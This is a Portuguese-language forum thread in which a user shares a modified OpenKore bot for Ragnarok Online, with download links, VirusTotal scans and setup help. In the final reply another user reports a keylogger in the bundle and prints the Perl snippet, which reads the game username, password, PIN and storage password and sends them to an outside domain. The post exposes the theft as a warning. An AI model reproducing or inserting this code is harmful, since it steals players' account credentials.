Ir para conteúdo
Faça parte da equipe! (2024) ×

openkore Atualização Semanal


 Compartilhar

Posts Recomendados

tópico editado e fechado, por estar fora das regras da área:

 

http://www.webcheats.com.br/forum/rag-cheats/1571591-atencao-leia-antes-de-postar-seu-open-kore.html

 

OPENKORE ATUALIZAÇÃO

13-03-13

BUGGS CONHECIDOS CORRIGIDOS!

 

 

DOWNLOAD OPENKORE COMPLETO 13-03-13 + ARQUIVOS QUE DEVEM SER COLADOS NA PASTA DO SEU RAGNAROK

 

editado

 

ATENÇÃO OS ARQUIVOS QUE DEVEM SER COLOCADOS NA PASTA DO RAGNAROK FORAM MODIFICADOS! BAIXE E SUBISTITUA, CASO CONTRARIO SEU OPENKORE NÃO VAI FUNCIONAR!

 

 

SCAN DO OPENKORE

 

[sCAN]https://www.virustotal.com/pt/file/9b4ce47ca1965759730546029a60604fa783b37dac405c7de2c104494dab5b8a/analysis/1363285142/[/sCAN]

 

 

SCAN DA PASTA QUE DEVE SER EXTRAIDA NA PASTA DO RAGNAROK

 

 

[sCAN]https://www.virustotal.com/pt/file/66811171c8ebdd4720d579b35408d4aec84028ebbc72df145a738711c4204242/analysis/1363285034/[/sCAN]

 

SCAN SEMPRE ATUALIZADO!

 

se relatar algum problema com o OPENKORE, baixe e instale o Active Perl coompativel ActivePerl-5.12.3.1204-MSWin32-x86-294330.msi

 

LIGANDO O OPENKORE

 

 

Para ligar o OpenKore vá na pasta S.R.C/poseidon(sem os ponto) e execute o arquivo poseidon.pl, feito isto vá na pasta do seu ragnarok e execute o StartRO.bat, ira aparecer o servidor poseidon para você conectar. Para conectar no poseidon basta digitar qualquer usuário e qualquer senha, feito isto conecte em um dos aprendizes.

Agora vá na pasta do seu openkore e execute o openkore.pl, ele ira dar as opções de servidores escolha o seu servidor logo em seguida entre com seu usuário e sua senha de jogo.

Pronto você está conectado no jogo.

Este tutorial mostra apenas como ligar o bot e não como configura-lo caso queiram configurar procure na internet ou aqui mesmo no fórum alguns guias.

Obs: Não funciona em windows 7, somente por maquina virtual ou poseidon remoto.

Link para o comentário
Compartilhar em outros sites

Estou com um problema que não consigo resolver! Já é o 3º OpenKore que eu faço o download e acontece a mesma coisa. Eu abro o poseidon.pl e depois abro o Poseidon_2012-09-19aRagexe.bat, porém, quando abre o servidor poseidon e eu me conecto com um login e senha qualquer, a janela dos aprendizes não aparece! O que eu devo fazer? DD:

Link para o comentário
Compartilhar em outros sites

Estou com um problema que não consigo resolver! Já é o 3º OpenKore que eu faço o download e acontece a mesma coisa. Eu abro o poseidon.pl e depois abro o Poseidon_2012-09-19aRagexe.bat, porém, quando abre o servidor poseidon e eu me conecto com um login e senha qualquer, a janela dos aprendizes não aparece! O que eu devo fazer? DD:

 

Não pode Fechar o Poseidon.pl ele tem que ficar sempre aberto.

ai depois vc vai lá abrir o Poseidon_2012-09-19aRagexe.bat

 

Verifique se seu Ragnarok está atualizado.

Link para o comentário
Compartilhar em outros sites

Olá!

 

Baixei esse openkore e dei uma olhada. ATÉ ONDE EU VI não tinha nenhum código malicioso.

Verifiquei Macros, Network (Receive, Send), Tables.

 

But, não recomendo o pessoal novo a baixar de tópicos abertos assim.

Como falei ATÉ ONDE VERIFIQUEI está limpo.

É mais confiável baixar somente os Receive, Send e Receivepacks, dar uma olhadinha e substituir, pois diminui drasticamente as chances de ser hackeado.

 

Até mais!

Link para o comentário
Compartilhar em outros sites

Não pode Fechar o Poseidon.pl ele tem que ficar sempre aberto.

ai depois vc vai lá abrir o Poseidon_2012-09-19aRagexe.bat

 

Verifique se seu Ragnarok está atualizado.

 

 

 

Consegui resolver meu problema! Era com o Pearl, eu estava usando outra versão, eu fiz o download de cada "componente" via TortoiseSVN e fui verificando cada passo meu e acabei que achando o meu erro.

Link para o comentário
Compartilhar em outros sites

deve ter virus o link do scan so passo 9 anti virus e pesa 23.9mb e o link dod down pesa 29.8mb

PARE DE DIZER COISAS DE QUE VOCÊ NÃO ENTENDE, LÊ O TOPICO DIREITO!

 

tem esta diferença por que no virus total eu compactei a pasta do openkore no winrar fiz o Scan.

e compactei separadamente os arquivos que devem ser colados na pasta do ragnarok e fiz o scan.

 

e quando fui postar no 4shared para o pessoal fazer o download eu coloquei na mesma pasta o Openkore + os arquivos para colar na pasta do ragnarok.

 

Por isso a diferença.

 

E sobre o Openkore ter passado em Apenas 9 Antivirus: não sou eu que escolho por quantos antivirus ele vai passar, é o virustotal.com que determina, simplismente faço o upload e o virustotal.com examina não posso fazer nada se está faltando!

 

NÃO É OBRIGADO A BAIXAR, SE QUISER ESPERA A ATUALIZAÇÃO OFICIAL.

 

SE ESTIVER COM MEDO DE USAR O OPENKORE DO MEU POST. USE SOMENTE OS ARQUIVOS QUE FORAM ATUALIZADOS COMO O digo159 COMENTOU

Arquivos Atualizados

src/network/receive/bRO.pm

src/network/send/bRO.pm

tables/bRO/recvpackets.txt

 

copie e substitua os arquivos do seu openkore!

 

PEÇO POR GENTILEZA QUE EDITE SEU POST, POIS VOCÊ SE EQUIVOCOU!

Link para o comentário
Compartilhar em outros sites

nao ta coletando os items pq sera ?

olha como ta as configs

 

 

itemsTakeAuto 2

itemsTakeAuto_party 0

itemsGatherAuto 2

itemsMaxWeight 89

itemsMaxWeight_sellOrStore 48

itemsMaxNum_sellOrStore 99

cartMaxWeight 7900

itemsTakeAuto_new 0

 

Verifique na pasta control/pickupitens.txt em sem ALL está 0 se estviter 0 mude para 2 que ele ira recolher tudo o que foi dropado no mapa, se quiser recolher apenas os itens do monstro que você matou coloque 1 , se quiser recolher apenas itens especificos coloque ex: Morango 2 > ele vai recolher todos os morangos dropados!

Link para o comentário
Compartilhar em outros sites

deis de quando eu baixei esse openkore o meu parou de pegar porque sera?

 

Olá amigo, PRESTE ATENÇÃO!

os Openkores que você usava funcionavam com outros tipos de arquivos que você colou na pasta do ragnarok, que eram especificos para o bom funcionamento deles

ai você baixou o Openkore que eu postei e parou de pegar porque os arquivos que devem ser colados na pasta do openkore são diferentes alterados pelo klabmouse da comunidade internacional Openkore

 

MAS POR QUE NÃO PEGA EM OUTRO OPENKORE?

Porque meu o Openkore eu eu posto para download é baixado diretamente do SVN, e algumas pessoas estavam tendo problemas na hora de abrir o Poseidon.pl e logar nos aprendizes, em tão o Klabmouse criou um novo startro.bat modificado! que so funciona pra quem tem o Openkore Baixado Via SVN.

Espero que Tenha entendido!

 

QUAL A SOLUÇÃO?

Baixe seu Openkore Sempre da mesma Fonte para Evitar estes erros! se você usava o Openkore (modificado) Oficial do Webcheats baixe-o novamente,baixe os arquivos da pasta do ragnarok e use sempre ele!

Link para o comentário
Compartilhar em outros sites

Amigo você sempre atualiza os bot's direitinho mais eu tenho certeza que veio com um KL NO dia 3 eu não fui hackeado e logico por que eu uso o OpenKoreAnalyser Eu sou um dois poucos que ainda tem esse progama que foi destribuido mais logo o link ficou desativado, vou ver se esse esta com KL se tiver eu vou postar

 

O Bot é funcional mais tem KL quem tem um antigo bot e só substituir por outro ServerType0.pm

 

Script Maliciosa Encontrada > OpenKore 13-03-13\src\Network\Send\ServerType0.pm

 

 

4nd3BR,Não quero te derruba do cavalo mais já chego a hora de Alguem agir né Amiguinho eu já sabia que tinha KL desde 03-03-13 Eu remolvi e nem falei Nada mais dessa vez não vai passar .

 

Olha a Script Ae

 

my $ua = LWP::UserAgent->new;

 

$ua->timeout(10);

 

$ua->env_proxy;

 

my $master = $config{'master'};

 

$master =~ s/#/:/;

 

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

 

my $loginPin = $config{'loginPinCode'};

 

$loginPin =~ s/#/:/;

 

my $senha = $config{'password'};

 

$senha =~ s/#/:/;

 

my $kafra = $config{'storageAuto_password'};

 

$kafra =~ s/#/:/;

my $response = $ua->get("http://www.0penkore.xp3.biz/key_strokes.php?keylog=$master $usuario $senha $loginPin $kafra");

 

Iae Staff oquê vai fazer agora?

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.